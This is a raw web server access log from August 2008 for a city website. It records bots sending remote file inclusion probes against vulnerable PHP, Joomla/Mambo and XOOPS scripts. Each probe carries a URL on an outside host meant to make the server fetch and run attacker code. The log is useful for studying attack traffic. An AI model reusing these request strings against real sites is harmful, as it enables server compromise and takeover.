74.6.22.119 - - [31/Aug/2008:21:02:20 -0700] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
12.192.82.221 - - [31/Aug/2008:21:02:52 -0700] "GET /logs/access_080329.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
12.192.82.221 - - [31/Aug/2008:21:02:52 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
12.192.82.221 - - [31/Aug/2008:21:02:52 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.6.22.119 - - [31/Aug/2008:21:03:48 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
89.111.176.116 - - [31/Aug/2008:21:03:50 -0700] "GET /logs/access_080401.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.111.176.116 - - [31/Aug/2008:21:03:50 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.111.176.116 - - [31/Aug/2008:21:03:51 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.202.116.5 - - [31/Aug/2008:21:05:01 -0700] "GET /logs/access_080329.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.202.116.5 - - [31/Aug/2008:21:05:01 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.202.116.5 - - [31/Aug/2008:21:05:02 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
80.67.19.103 - - [31/Aug/2008:21:06:22 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:21:06:50 -0700] "GET /logs/index1.php?choix=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:21:06:50 -0700] "GET /index1.php?choix=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:21:06:50 -0700] "GET /logs/access_080501.log/index1.php?choix=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:21:07:49 -0700] "GET /logs/access_080201.log%20/index1.php?choix=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
89.248.110.152 - - [31/Aug/2008:21:08:07 -0700] "GET /logs//component/option,com_custompages/Itemid,157//index.php?option=com_custompages&cpage=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.248.110.152 - - [31/Aug/2008:21:08:07 -0700] "GET /logs/access_080601.log//component/option,com_custompages/Itemid,157//index.php?option=com_custompages&cpage=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.248.110.152 - - [31/Aug/2008:21:08:09 -0700] "GET //component/option,com_custompages/Itemid,157//index.php?option=com_custompages&cpage=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:21:09:03 -0700] "GET /index1.php?menu=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
89.248.110.152 - - [31/Aug/2008:21:09:04 -0700] "GET /logs/access_080701.log//component/option,com_custompages/Itemid,157//index.php?option=com_custompages&cpage=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:21:09:08 -0700] "GET /logs/access_080701.log/index1.php?menu=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:21:09:08 -0700] "GET /logs/index1.php?menu=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
67.205.111.117 - - [31/Aug/2008:21:10:10 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:21:12:30 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:21:12:31 -0700] "GET //?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 917 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:21:12:31 -0700] "GET /logs//?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 4089 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
207.249.0.39 - - [31/Aug/2008:21:13:20 -0700] "GET /logs/access_080329.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
207.249.0.39 - - [31/Aug/2008:21:13:20 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
207.249.0.39 - - [31/Aug/2008:21:13:20 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:21:13:35 -0700] "GET /logs/access_071201.log//?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
77.222.40.169 - - [31/Aug/2008:21:16:24 -0700] "GET /logs/access_080329.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.222.40.169 - - [31/Aug/2008:21:16:24 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.222.40.169 - - [31/Aug/2008:21:16:24 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.47.247.136 - - [31/Aug/2008:21:16:34 -0700] "GET /logs/access_080201.log//?path%5Bdocroot%5D=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
202.47.247.136 - - [31/Aug/2008:21:16:35 -0700] "GET //?path%5Bdocroot%5D=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 917 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
200.150.189.10 - - [31/Aug/2008:21:19:45 -0700] "GET /logs/access_080701.log/htmltonuke.php?filnavn=http://www.viniciu-s.net/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
200.150.189.10 - - [31/Aug/2008:21:19:45 -0700] "GET /htmltonuke.php?filnavn=http://www.viniciu-s.net/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
200.150.189.10 - - [31/Aug/2008:21:19:45 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.viniciu-s.net/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
85.214.71.29 - - [31/Aug/2008:21:20:12 -0700] "GET /logs/access_080330.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
85.214.71.29 - - [31/Aug/2008:21:20:12 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
85.214.71.29 - - [31/Aug/2008:21:20:13 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
193.207.106.54 - - [31/Aug/2008:21:20:50 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
200.150.189.10 - - [31/Aug/2008:21:20:58 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://www.viniciu-s.net/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
80.74.146.175 - - [31/Aug/2008:21:22:38 -0700] "GET /logs/access_080331.log//index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
80.74.146.175 - - [31/Aug/2008:21:22:38 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
80.74.146.175 - - [31/Aug/2008:21:22:38 -0700] "GET //index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
80.74.146.175 - - [31/Aug/2008:21:22:39 -0700] "GET /logs/access_080701.log//index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:21:25:00 -0700] "GET /logs/access_080701.log/!scanhttp://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:21:25:00 -0700] "GET /!scanhttp://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:21:25:00 -0700] "GET /logs/!scanhttp://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
67.205.111.117 - - [31/Aug/2008:21:25:04 -0700] "GET /logs/access_080701.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [31/Aug/2008:21:25:04 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [31/Aug/2008:21:25:04 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:21:25:39 -0700] "GET /logs/access_080331.log/!scanhttp://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.238.195.13 - - [31/Aug/2008:21:29:07 -0700] "GET /htmltonuke.php?filnavn=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
63.208.74.34 - - [31/Aug/2008:21:30:31 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.231.2 - - [31/Aug/2008:21:30:40 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
67.212.173.42 - - [31/Aug/2008:21:31:55 -0700] "GET /logs/access_080701.log/htmltonuke.php?filnavn=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
67.212.173.42 - - [31/Aug/2008:21:31:55 -0700] "GET /htmltonuke.php?filnavn=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
67.212.173.42 - - [31/Aug/2008:21:31:55 -0700] "GET /logs/htmltonuke.php?filnavn=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:21:32:38 -0700] "GET /logs/access_080701.log/htmltonuke.php?filnavn=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:21:32:38 -0700] "GET /htmltonuke.php?filnavn=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:21:32:38 -0700] "GET /logs/htmltonuke.php?filnavn=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
63.208.74.34 - - [31/Aug/2008:21:32:46 -0700] "GET /logs/access_080401.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
63.208.74.34 - - [31/Aug/2008:21:32:46 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
63.208.74.34 - - [31/Aug/2008:21:32:46 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
63.208.74.34 - - [31/Aug/2008:21:32:49 -0700] "GET /logs/access_080330.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [31/Aug/2008:21:33:55 -0700] "GET /logs/access_080701.log/htmltonuke.php?filnavn=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [31/Aug/2008:21:33:55 -0700] "GET /htmltonuke.php?filnavn=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [31/Aug/2008:21:33:55 -0700] "GET /logs/htmltonuke.php?filnavn=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [31/Aug/2008:21:34:07 -0700] "GET /logs/access_080701.log/htmltonuke.php?filnavn=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [31/Aug/2008:21:34:07 -0700] "GET /htmltonuke.php?filnavn=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [31/Aug/2008:21:34:07 -0700] "GET /logs/htmltonuke.php?filnavn=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:21:34:26 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:21:34:27 -0700] "GET //?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:21:34:27 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 200 4089 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:21:35:17 -0700] "GET /logs/access_071201.log//?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.212.173.42 - - [31/Aug/2008:21:35:20 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:21:37:34 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [31/Aug/2008:21:37:44 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [31/Aug/2008:21:38:29 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.238.195.13 - - [31/Aug/2008:21:42:31 -0700] "GET /logs/access_080701.log/htmltonuke.php?filnavn=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.238.195.13 - - [31/Aug/2008:21:42:32 -0700] "GET /htmltonuke.php?filnavn=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.238.195.13 - - [31/Aug/2008:21:42:32 -0700] "GET /logs/htmltonuke.php?filnavn=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.238.195.13 - - [31/Aug/2008:21:42:56 -0700] "GET /logs/access_080701.log/htmltonuke.php?filnavn=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.238.195.13 - - [31/Aug/2008:21:42:56 -0700] "GET /htmltonuke.php?filnavn=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.238.195.13 - - [31/Aug/2008:21:42:56 -0700] "GET /logs/htmltonuke.php?filnavn=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
151.11.24.250 - - [31/Aug/2008:21:43:57 -0700] "GET //ashnews.php?pathtoashnews=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
151.11.24.250 - - [31/Aug/2008:21:43:57 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
151.11.24.250 - - [31/Aug/2008:21:43:57 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
151.11.24.250 - - [31/Aug/2008:21:44:19 -0700] "GET /logs/access_080330.log//ashnews.php?pathtoashnews=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:21:44:44 -0700] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:21:44:44 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:21:44:44 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:21:44:45 -0700] "GET /logs/access_080401.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:21:46:18 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:21:46:18 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:21:46:18 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:21:46:21 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:21:46:21 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:21:46:21 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
201.238.195.13 - - [31/Aug/2008:21:47:07 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.238.195.13 - - [31/Aug/2008:21:47:38 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
58.69.172.67 - - [31/Aug/2008:21:50:26 -0700] "GET /logs/access.log//include/write.php?dir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
58.69.172.67 - - [31/Aug/2008:21:50:28 -0700] "GET /logs/access.log//include/write.php?dir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
58.69.172.67 - - [31/Aug/2008:21:50:30 -0700] "GET //include/write.php?dir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
58.69.172.67 - - [31/Aug/2008:21:50:32 -0700] "GET //include/write.php?dir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
58.69.172.67 - - [31/Aug/2008:21:50:33 -0700] "GET /logs//include/write.php?dir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
58.69.172.67 - - [31/Aug/2008:21:50:35 -0700] "GET /logs//include/write.php?dir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:21:51:16 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 200 4089 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:21:51:16 -0700] "GET //?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:21:51:22 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 200 4089 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:21:51:22 -0700] "GET //?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
63.208.74.34 - - [31/Aug/2008:21:52:22 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
63.208.74.34 - - [31/Aug/2008:21:52:22 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.231.2 - - [31/Aug/2008:21:53:39 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
